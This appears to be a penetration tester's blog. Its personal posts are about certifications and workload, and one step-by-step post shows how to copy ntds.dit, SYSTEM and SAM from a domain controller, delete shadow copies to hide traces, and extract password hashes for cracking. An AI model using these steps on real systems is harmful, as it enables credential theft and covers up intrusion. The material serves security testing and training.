Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I have been currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customers doing PCI work. Usually never works out in my favor, and makes for working long hours, with no compensation for it.
My bosses boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill me on the team, but another person left in November leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLMSYSTEM c:SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
 • libesedb
• ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
 Runing esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
–sid <user sid>
List user identified by SID
–guid <user guid>
List user identified by GUID
–name <user name regexp>
List user identified by the regular expression
–active
List only active accounts
–locked
List only locked accounts
–syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
–lmoutfile <name of the LM hash output file>
–ntoutfile <name of the NT hash output file>
–pwdformat <format of the hash output>
ophc – OphCrack format
When this format is specified the NT output file will be used
john – John The Ripper format
ocl – oclHashcat format
When this format is specified the NT output file will be used
–passwordhashes
Extract password hashes
–passwordhistory
Extract password history
–certificates
Extract certificates
–supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
–membership
List groups of which the user is a member
–csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
–debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
–lmoutfile (output file for LM hashes)
–ntoutfile (output file for NTLM hashes
–pwdformat john (output in JTR format)
–syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> –passwordhashes –lmoutfile <LM OUT FILE> –ntoutfile <NTLM OUT FILE> –pwdformat john –syshive <SYSTEM FILE>
(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…

PCI-QSA Training

Spent the past 2 days in Boston in the PCI-QSA training class. Taking the exam the last hour and a half of the class, but will not know the results until a week or two later. The Class was interesting, and I learned a little bit of information from the instructor on his perspective of doing assessments. I meat several interesting people, from all over the world, and working for different companies. I though it very interesting talking to the people working for the accounting firms, and how they were using the QSA certification with their clients. Most of them were doing just gap analysis and not actually signing ROCs for clients.
Well hope to hear if I passed….  

Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. Have been procrastinating for several months before I had to finally break down and take the certification before my time expired in late April 2015.
Spent a few days going over the books to refresh me on the content that we went over, and took one of the practice exams and actually did not do too well on it. Never taking a SANS cert before I was not sure what to expect, and probably should have actually allowed for the 2 hours to sit the practice test. Rushed though it and guessed a lot of the questions, and did not remember going of half of the info. (Note to self actually read the questions and each answer and not just say that looks good.) Overall I was a little frustrated after the first  practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion, and not actual facts. Several of the questions had more to do with general penetration testing then actually web application testing, like needing to know the TTL from a DNS request for a domain name.
So read the books a few more days before taking the second practice test, which I did much better on, since I had some idea on what to expect on the test.Did rush though it again actually did the entire test in 48 minutes. Which is really not that great, but I just wanted to make sure I had some idea what they real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question throughly.
Sat for the exam on April 9, 2015. Finished the test and passed it fairly easily, but was some what perplexed that it had nothing similar to the practice tests. It seemed the the practice exams had nothing to do with the the actual exam. Many of the questions were topics that were in the books, but never brought up in the practice tests. Which frustrated me a little, since I had to spend a little more time looking for some of the answers, that I had not really gone over previously.
So anyone planning on sitting the exam, and that has not taken a SANS cert before, plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test, it might actually make you study information that is never asked on the exam.